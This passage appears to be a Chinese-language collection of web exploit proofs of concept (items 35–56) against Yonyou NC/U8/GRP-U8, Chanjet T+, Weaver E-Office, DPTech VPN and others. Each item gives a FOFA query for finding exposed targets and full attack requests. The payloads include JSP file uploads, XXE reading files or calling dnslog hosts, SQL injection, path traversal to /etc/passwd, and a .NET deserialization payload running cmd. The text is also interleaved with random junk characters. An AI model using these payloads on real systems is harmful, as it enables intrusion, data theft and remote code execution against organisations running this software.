; R# t1 y0 L) c7 g$ E* {Host: 203.25.218.166:88882 v( z Q/ r/ w2 q* q0 `, s U
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
1 ~" O! Q) m. F; T- i: g8 T5 }Accept-Encoding: gzip, deflate
3 M. l) d) F* X" @1 G1 ~9 F; BAccept: */*% H( L' m7 u# O; ^" d6 I# u
Connection: close5 S6 t( _) @0 y- _
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
- G' k! x5 c3 M3 ]$ WContent-Length: 190
" j0 B! C& S7 O2 `& o* tContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
/ G; Q$ U; R. E. b
% n x& p- ?' k) |1 C; ?: D* M2 L) c--fd28cb44e829ed1c197ec3bc71748df0
2 t5 r6 T% f# h, p9 LContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
: d9 b3 E9 {: n1 S- ]" K$ s, K! y, A7 k6 R/ _2 P/ s) y
<%out.println(1111*1111);%>- E. P9 r2 j" w, Z$ B+ y! p e
--fd28cb44e829ed1c197ec3bc71748df0--
2 [9 E; `' Y; y
+ K3 A9 H; U, U! O. y% n
) k7 w q% o( i$ Q7 U8 ~36. 用友NC-Cloud soapFormat XXE2 z5 M7 @$ T3 V* X- R0 q; k
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
1 U7 R k" B( L8 B6 p8 _- S, RPOST /uapws/soapFormat.ajax HTTP/1.1
i$ E3 l; Z) C/ h9 eHost: 192.168.40.130:89899 T4 K" y) C4 |5 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
8 C( l8 F5 U7 K& b$ H* b: KContent-Length: 263
# M2 W4 I% t9 ~- A0 J9 I& mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 [/ l4 `' B# R. _# qAccept-Encoding: gzip, deflate
K: N, ]9 u* k" XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 `* o- J, C4 ^ I+ k
Connection: close
/ R* t+ Y6 E! Z! IContent-Type: application/x-www-form-urlencoded
, D8 H9 _' m3 |3 qUpgrade-Insecure-Requests: 1
6 K1 }" m y g; k% A6 U$ ~
4 b0 I# z* y2 P5 \8 |% X: Nmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
' e0 [) P) w$ E* z. o/ m6 x" m8 c0 Y
" M/ X- a5 s/ y* D, _37. 用友NC-Cloud IUpdateService XXE
+ Y& e, t3 n6 kFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"9 m. }; i& P% Y! f* O
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
/ D$ F: o$ `) kHost: 192.168.40.130:8989
& n! Q, w- S4 R8 Z, T' N6 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
2 u, Z7 } `8 UContent-Length: 421
. Z, A- X' i# ] oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ ?) P9 o/ L7 o7 X1 U+ U; w- L
Accept-Encoding: gzip, deflate
5 _8 z" W$ u3 e1 ^9 @; CAccept-Language: zh-CN,zh;q=0.9* t9 j, I8 K7 k8 o3 [ v! ~
Connection: close" n. \: F1 Z6 o' ?2 G. R# q
Content-Type: text/xml;charset=UTF-86 G6 W$ F/ ~4 M- J$ k; V
SOAPAction: urn:getResult
# G# C2 v: L$ {0 K& Y- M4 K0 r) BUpgrade-Insecure-Requests: 1+ g$ Q$ f, Y" w8 o
2 s8 l2 M: y% e! a: H# e1 p: E<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
% `- L) l- `) G9 G# A' E, ~2 z<soapenv:Header/>
6 y. d- K! Q C" @<soapenv:Body>* J& V/ b% b8 h5 p
<iup:getResult>
$ R" x! @8 H* U5 p3 B! f' N& s+ A. P<!--type: string-->7 O6 W, Y+ d1 g/ D* y
<iup:string><![CDATA[ k8 W8 B# f8 D/ `
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>: t+ A3 ?* z2 x+ Q- g
<xxx/>]]></iup:string>1 X, |3 }/ x! ]" ^
</iup:getResult>
8 U! E- Z3 C6 ?% ?" ?8 h: a</soapenv:Body>
# s) h1 [4 N% B' A</soapenv:Envelope>( ^7 \+ i) c& p5 k8 B8 N: F0 M
, U, `! \8 V3 i4 s7 S& g7 F) G1 l6 y! B. x+ z, j
* [- x5 t) R, t" w& e' \8 w38. 用友U8 Cloud smartweb2.RPC.d XXE
+ E, b/ x( e( }; [FOFA:app="用友-U8-Cloud"' S3 ^: X3 v- @3 d9 q* W, p
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
' F: i. ~* Y0 n3 `( P: qHost: 192.168.40.131:8088
, \' f9 l& {$ H3 O2 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25$ p, ^. D* r; \5 I8 D3 r
Content-Length: 260
- U; z4 \+ @8 A* v4 V4 r* |4 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3- b" |' f; T; Y0 S% f
Accept-Encoding: gzip, deflate: ?; M& m2 u$ L, l j
Accept-Language: zh-CN,zh;q=0.9
% v9 i- C# J- B- k9 J! n) {Connection: close
3 w1 {; z/ F$ [7 x' GContent-Type: application/x-www-form-urlencoded
/ \" R0 O4 g) Q6 j& p+ P8 y3 r+ M# x# ^4 B( K* ?" {6 m# i
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>' n: ~6 X& Z4 J
( o/ |% P4 z4 m* p
8 C$ b" ?5 q. I) ]& {( [4 f8 l39. 用友U8 Cloud RegisterServlet SQL注入% l) v: k: J/ x: _) K' i+ X8 L
FOFA:title="u8c"
6 W9 E/ e3 \6 M HPOST /servlet/RegisterServlet HTTP/1.1) A2 [7 C5 T% ?4 k; E
Host: 192.168.86.128:8089
7 B2 s* X6 W* S h& A3 f' |2 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
' q7 ?9 |' H5 F9 v3 b6 F# kConnection: close
% h. x7 l, M0 Y' h" cContent-Length: 85
H3 [$ b, J4 s2 I( y d5 vAccept: */*
+ H, d/ ~1 l0 WAccept-Language: en1 n3 O$ _; d: c! b5 r( E
Content-Type: application/x-www-form-urlencoded1 i' j/ E1 X; z$ U0 k
X-Forwarded-For: 127.0.0.1) d$ q( u' g* _+ f, u
Accept-Encoding: gzip
1 {( w! A. i2 D6 [( V& a4 i. b$ p7 r3 I$ ^/ R3 h. w; _
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0-- Y3 E; K2 U6 h( O0 m
4 ~2 {8 O& I2 Q8 `+ ^+ P; H
: S$ [; X3 x7 u- `/ |* D+ o `4 s40. 用友U8-Cloud XChangeServlet XXE( @' W. C- \& ]; S6 r ^% [- P
FOFA:app="用友-U8-Cloud", @2 G( x1 \# p- F' [6 G! r
POST /service/XChangeServlet HTTP/1.1
" S- o! C9 W# N1 H, t ~& MHost: x.x.x.x
! X$ e3 @! d4 j1 d9 xUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: C8 a, {9 a$ n! nContent-Type: text/xml
: p1 P& }# I' t+ ^$ ?- ?Connection: close# q7 F7 Y( `% H$ }
2 g8 l0 T, U0 v, v* a
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
8 g8 \& [2 u0 A' v9 S. M; ^! B* ^9 X, c3 f& I6 v& Q
1 `% S! P m8 o; @) x- R* m41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
, b* i1 Z/ z, {# o& g; NFOFA:app="用友-U8-Cloud"
& \" _/ Z5 i' u9 wGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.18 q+ k( M7 v6 }+ Z6 A7 `1 y
Host:
. ~* I% ?% p5 N7 ?8 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ U( _0 H9 A- k# e
Content-Type: application/json
( m- i% z3 Y0 Y' ?! a# wAccept-Encoding: gzip$ g: e& ^9 a! {
Connection: close5 e/ m, T9 T0 p; K
/ \4 k3 i9 t: C7 p8 X
! D( u7 O3 w: Y3 O42. 用友GRP-U8 SmartUpload01 文件上传
# L$ f- C/ f) E' p f' \8 cFOFA:app="用友-GRP-U8"- P0 U5 f$ p* ^# ^
POST /u8qx/SmartUpload01.jsp HTTP/1.1
) }$ p5 ]5 n7 CHost: x.x.x.x
" p5 ~) F! n! F R9 X9 D% VContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt* _, P( N: {$ f" _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
, W' D) u1 ?8 O. X
[* X3 z3 x* o- w: kPAYLOAD
! H+ M% Q1 ^+ x) [ E" E
. N3 q- D7 v u5 ?9 M2 P4 \+ j- ]! m; w, O3 P8 I( Q
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
9 ]+ O# `* n* O" P( s- e% D" B* d$ R, V: ~. S
43. 用友GRP-U8 userInfoWeb SQL注入致RCE9 v* n. B& b/ H+ O. q
FOFA:app="用友-GRP-U8"
. _1 K& N; v2 {& X; nPOST /services/userInfoWeb HTTP/1.10 d. B3 i- d8 O# t' T; {
Host: your-ip( \; ` K8 w& B( D5 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36/ R8 C' n1 Y$ a( f% T% i' D/ O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 k9 J8 a+ X2 {9 p1 GAccept-Encoding: gzip, deflate
! u& S* a/ Z8 L* v9 E) mAccept-Language: zh-CN,zh;q=0.9* ^+ w, N) e: Z; i" z
Connection: close8 ^) a( x4 A$ [1 n6 [7 \
SOAPAction:
1 ? [6 Y% u9 I/ K( `Content-Type: text/xml;charset=UTF-8
" n6 r! ]' O- I- r+ A2 Y* l) j8 F2 o
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
, Z4 h5 m( W% {, d) P <soapenv:Header/>
+ C. E; u, m4 n6 L <soapenv:Body>
+ w% I/ I- O: f/ a <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
$ q8 G' A% a4 P0 W( v <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
{; E! h; Z+ O' J </ser:getUserNameById>! N7 g) t2 ]+ ^8 J0 o
</soapenv:Body>
+ b! H2 L% f3 w</soapenv:Envelope>6 S9 _1 F- z4 S& D$ k c9 d$ y" u
7 x ~+ m. g; P9 n' v6 ^& |
# y& S: z, S; r# @44. 用友GRP-U8 bx_dj_check.jsp SQL注入
# C6 M, C- ]$ y3 Y! o6 pFOFA:app="用友-GRP-U8"
( K3 [; P. w4 [9 n3 c# ?- xGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1& u. `/ x8 e0 L, F
Host: your-ip4 ~! P$ S/ d; O7 ?6 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36: e; r; R0 Z" I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% ^7 ]1 ^0 O0 N) Q; N% e7 yAccept-Encoding: gzip, deflate
- C6 P& _1 T# Y: x1 wAccept-Language: zh-CN,zh;q=0.9; v: y7 H& c# E8 o5 X1 `% w' e
Connection: close
& c7 x( z# @( d7 b- L0 T) r2 a6 U, m- G, `% O6 f" t
% d0 x( o* W! N. ~, d2 ]4 }45. 用友GRP-U8 ufgovbank XXE# E* d4 \ B4 B7 y1 r
FOFA:app="用友-GRP-U8"
# l* Z7 {; l- X0 DPOST /ufgovbank HTTP/1.1$ k- r( V u% b- c2 |
Host: 192.168.40.130:222/ G! J2 o4 q, d2 R) R2 o. `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0# r0 }; O) Z# o. g8 K7 D
Connection: close1 H. C$ ]- Y" g
Content-Length: 161. i( I8 F" X5 J' {. Q3 o0 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ @0 p- O/ Z+ y) x0 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, I6 J7 h5 S! h( O2 ^
Content-Type: application/x-www-form-urlencoded
& q- B: }( Q, E( B1 RAccept-Encoding: gzip
0 @9 c. _( [0 X% @7 j! M; [1 ~% b5 F/ K; r) s8 G1 T
reqData=<?xml version="1.0"?>
, p) [$ N$ P6 g! j" K<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
* l& H3 X7 W0 B8 ?6 ]/ X) \9 {' M( G/ B3 ]/ b6 q( H
/ j6 L7 W J9 y) q% z- J
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% R) `" z2 L/ I9 ?% T& BFOFA:app="用友-GRP-U8"
6 q3 ?) T6 F, V5 K7 FGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1# L: H6 ]6 \% G1 I- o4 h5 b
Host: your-ip/ f Y0 P) b M( _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" O9 n7 N: P2 { F9 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( a, k. ^" _9 f' `5 J5 I$ H1 P/ Q0 |Accept-Encoding: gzip, deflate
) l- h8 ?/ y8 w/ dAccept-Language: zh-CN,zh;q=0.9% N K+ ], r1 z4 z. P& @% ?: P
Connection: close5 t# g9 [. k( g. E
4 c! B9 ^6 k8 w: ^3 X4 t: [% M
. p; h# X& L I1 t8 K, ]47. 用友GRP A++Cloud 政府财务云 任意文件读取
8 b- i- l9 Q9 |" S( o* v4 AFOFA:body="/pf/portal/login/css/fonts/style.css"
, c/ O2 s2 C: |% R+ ^8 t" _+ W- {: NGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1: B2 B, U0 i7 i$ Z' N
Host: x.x.x.x) ~5 |+ i- u' f* @/ F3 a
Cache-Control: max-age=0
+ X! B- u" K4 @* y% _/ OUpgrade-Insecure-Requests: 1
: r" P: r( r6 i4 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: j+ ^# l8 C" T( m4 [9 k% UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( p# o3 T& [4 g' b; j1 @/ {
Accept-Encoding: gzip, deflate, br& [! M Z# m1 N* p. R* U' N# J( e# r
Accept-Language: zh-CN,zh;q=0.9/ |$ F: I& U) P& g# p+ o; `" f
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
! ]( Y5 ^+ W5 y' AConnection: close
- N0 m& J# `: d) e- }
+ p- \+ m/ d1 S! ^
( F5 P8 ?, A2 f: E0 z% @$ H$ r0 c! i4 N2 g5 K
48. 用友U8 CRM swfupload 任意文件上传, R* n5 a4 w( B7 p; I2 d7 ]
FOFA:title="用友U8CRM"
+ a- D$ h/ _- {; p: DPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
) ^9 t* P H) W( n& b* OHost: your-ip
+ J6 x; u+ E' w/ f& D/ YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
0 d5 w5 ~$ k( d( S U6 K" YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 c: p6 e& a7 f1 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 B! v( j2 \! }9 U6 y' J
Accept-Encoding: gzip, deflate/ U4 C j0 |1 U) G
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855, q0 g* V% o* V6 l! }; c/ F
------269520967239406871642430066855: v1 Y. P" m2 o7 ^$ e: s
Content-Disposition: form-data; name="file"; filename="s.php"2 v3 x4 O- o9 _' q+ }1 |5 M' ]
12317 D1 X. g/ w7 o, v9 @* o$ i
Content-Type: application/octet-stream5 @! W) C. I$ \- ]
------269520967239406871642430066855
7 e( g/ T" O+ E8 }( M2 A. AContent-Disposition: form-data; name="upload"5 S9 J5 ]: n: |
upload
+ I5 H2 v9 J: R5 ^- w------269520967239406871642430066855--5 z, P5 f/ e- x# ~" `4 L' X4 {
$ G$ H& J( e6 s2 l0 t) j+ n( g1 ]( W I: r0 k$ ~
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
; k$ ^: G) I8 M! XFOFA:body="用友U8CRM" q, [7 M) V8 i
; D% W2 o9 V4 G7 e' @
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1% B6 w* m9 {! _0 \0 D. M. g
Host: x.x.x.x
0 D8 @6 l* Q# Z( h0 q: }1 Q6 x9 ?) |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! Z1 Z# y, H& d3 g! ?: m
Content-Length: 329
3 N( x0 Z- U! O8 e, f7 r* X% aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ B4 Y# ?; w! x! UAccept-Encoding: gzip, deflate1 n; _; M C( W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* a" ]& X8 I/ L( ]* s& ?Connection: close
) O5 I* Z) g, M- j/ y- ?Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
) H6 Z- _8 A+ B' T0 ]9 X8 U! p% q3 h) p d ]
-----------------------------vvv3wdayqv3yppdxvn3w
% W6 Z. R9 {5 `$ q2 yContent-Disposition: form-data; name="file"; filename="%s.php "3 }/ w( k$ R; a) @8 ?3 M3 }
Content-Type: application/octet-stream
/ a# t0 }/ r: g5 l: X0 [6 p$ w# z I. o8 X
wersqqmlumloqa I! I* f' j" N* p" k
-----------------------------vvv3wdayqv3yppdxvn3w% w% I# J, v/ }+ f( ~
Content-Disposition: form-data; name="upload": D, h1 S8 p+ ?! ^5 l; V
! J6 V3 Y) D5 _. v
upload; G5 V% b# s' o. {
-----------------------------vvv3wdayqv3yppdxvn3w--6 {8 v. |& n, ?
. @1 r+ g0 k, a) F- W& F; C5 K) o# m( ~$ J( _; U
http://x.x.x.x/tmpfile/updB3CB.tmp.php
3 V/ D; ]- v! G% r$ N
8 q% z9 O. I8 y4 b$ z50. QDocs Smart School 6.4.1 filterRecords SQL注入
! [" _7 x% v: y! O6 dFOFA:body="close closebtnmodal"
3 |( H/ w. I Z" n$ U% pPOST /course/filterRecords/ HTTP/1.1
1 Y+ J# J/ \8 sHost: x.x.x.x/ q# G; ^% A# [/ u% W5 R$ X- r
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36+ E+ h0 H2 J: ~0 x/ I8 N
Connection: close, W( \: n: T8 u. c: Z6 [& u# b" _
Content-Length: 224
# w. D7 s0 x) VAccept: */*: c6 M) s( F; ~6 n7 Q, m
Accept-Language: en
; V) n3 ~' V! TContent-Type: application/x-www-form-urlencoded
4 V$ y" k, r6 i2 B7 r; OAccept-Encoding: gzip( T' m9 }) y1 J) R6 I( d# p4 g
. r1 H3 c9 c) N6 G% ^1 I) z1 d
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1/ t% G5 [1 G% s: N' M' _$ N( P
6 O5 e5 l8 ^. n% q+ a
, b5 J" K/ V8 @, V. k
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入5 P) v0 ~$ `6 N" m$ B$ I! i
FOFA:app="云时空社会化商业ERP系统"
2 M7 L4 v4 m' D( y6 ]- ?GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
3 t, D3 g9 ?5 BHost: your-ip
7 T% y7 @0 ^, \2 G( eUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
1 P# J) e8 q! }) TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- r' A% M4 I8 L0 x( @' Q% a0 A
Accept-Encoding: gzip, deflate
" N* E2 O) B/ T( d8 e+ rAccept-Language: zh-CN,zh;q=0.9. f1 } M( W+ y7 t5 [6 ~
Connection: close
1 x: _+ J+ h. C0 @% x) \4 |! { j3 ^" Z/ a$ C6 `, @4 o
( T& Z6 V+ E$ |9 F
52. 泛微E-Office json_common.php sql注入
5 |$ a5 `. M9 X6 u7 q+ K1 EFOFA:app="泛微-EOffice"
; W0 ?- `" K( k- p, }9 Y kPOST /building/json_common.php HTTP/1.1
# K1 P/ f9 l! b5 f9 ]5 UHost: 192.168.86.128:80970 o) {" ^& C0 G8 T& j4 m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: p3 t8 s& x+ m! N% z0 N, U; h- V
Connection: close
# R! F* T' k: a4 Z9 K$ W8 ^* EContent-Length: 87* n2 d: E! ?9 _5 c) N8 \
Accept: */*
: N* ?" Q7 D% r" oAccept-Language: en
5 B4 }1 A0 N: j: |) I: SContent-Type: application/x-www-form-urlencoded+ n+ t) g8 x; m3 |1 B
Accept-Encoding: gzip; R" |: E; e# d, U" p- r1 C
/ c4 v: q. x7 f1 u0 W$ c
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ M: r0 _! Z! G9 a8 r1 `0 H# `/ o. s2 C; L$ h4 x
) [5 S5 S. p$ W1 G. `+ A( d
53. 迪普 DPTech VPN Service 任意文件上传$ O0 x, f- s5 s7 p O$ Y7 ?% ?
FOFA:app="DPtech-SSLVPN"0 F- p1 i9 y, g2 v6 ]& I( b$ {& w
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd8 W4 |! k. D$ L1 E1 H
! z$ ^# t5 ]0 f5 ?8 f. ^; L* y, m/ T" T
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
. D8 s" D, d. e6 {) tFOFA:app="畅捷通-TPlus"& ~) k0 d6 i, @' w
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件 G) M+ k% W! O
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt", {/ v, O9 B" P* Y: j9 M
5 u% O$ ^* j* {: x4 Z
; A3 _& A: K5 F$ W# K8 G
完整数据包
" D% m8 y4 b1 [& Z& P, {: TPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1; V" z6 Y, E" Q. v [* K8 G1 d
Host: x.x.x.x
5 j% g+ J; a0 @! O7 tUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F8 A: H0 o7 k2 R9 @: S
Content-Length: 593
! I. O. ?- W8 s2 s1 T- O/ H
4 h {# }- u% J6 n4 [{
+ J+ L9 m- _1 i: ^% j# L, Q"storeID":{
3 j, Q$ t8 [% s: p* o "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",, L) u, N( y3 g$ ^+ h
"MethodName":"Start",4 e# I- r) |, {" _! [3 x0 A& E
"ObjectInstance":{& C5 u, Y! m5 b. S V
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% {" x7 F% q: T+ S: T* r0 b
"StartInfo":{
: J7 Y5 W) n4 ?; k7 u "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
) d' y9 {1 f! Z7 s7 s1 {' X "FileName":"cmd",
+ @! m! b7 R) w9 l- y% n# S( e "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
2 l6 L, J6 w( ]! h0 v5 u" S }; {% P+ d" @( a% ^/ E; _; }
}) ]% s& {8 p+ y$ ?" K, P4 s
}4 b* J$ `" Q% @1 o" B
}
) u8 F8 v. o" O1 F& `9 `2 ]
% ^; r" }) i# `& s! k$ Y2 ^
" t! h; u/ G! {! R! d, Q第二步,访问如下url
; ~1 o8 {- x( J7 x" i. H/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt+ K$ Y7 }- N7 G, B9 e& w2 U; x" M( x
, F5 p: g8 N9 Z% b7 q1 N6 C) T; h7 w7 P! {1 I! B
55. 畅捷通T+ getdecallusers信息泄露5 P+ P7 k$ M: J% \7 a3 [9 I0 x$ M
FOFA:app="畅捷通-TPlus"3 j+ Z# [ E6 @ t4 X; F2 g
第一步,通过' N. m( a8 [3 Z& b
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
' {& P% ^% @. @ Z% N l: \0 V4 G第二步,利用获取到的Cookie请求) A0 Y. v8 d' u- i# A' y* |8 \, H! v. H
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
) @6 C5 J% j; W8 t4 {, r5 M; o7 O2 z3 ?! q e- j
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
m w& X& ]( wFOFA: app="畅捷通-TPlus"* |( O9 K. s. s. t, m
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1# T' w( m! ]$ K+ K3 y
Host: x.x.x.x3 v* o$ E- w. G6 S0 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.361 L3 w& r' ?0 v6 {& F! }
Content-Type: application/json
